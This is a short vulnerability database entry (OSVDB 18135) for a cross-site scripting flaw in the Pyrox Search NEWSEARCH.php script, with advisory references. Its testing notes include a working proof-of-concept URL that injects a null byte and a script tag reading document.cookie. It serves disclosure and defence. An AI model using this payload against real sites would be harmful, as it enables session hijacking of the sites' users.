Pyrox Search NEWSEARCH.php whatdoreplace Variable XSS

2005-07-21T08:26:57
ID OSVDB:18135
Type osvdb
Reporter OSVDB
Modified 2005-07-21T08:26:57

Description

Manual Testing Notes

http://[victim]/[path]/NEWSEARCH.php?whatdoreplace=whatdoreplace%00<script>alert(document.cookie)</script>

References:

Vendor URL: http://freephp.html.it/script/view_script.asp?id=415 Secunia Advisory ID:16154 Other Advisory URL: http://www.rgod.altervista.org/pyroxsearchpoc.txt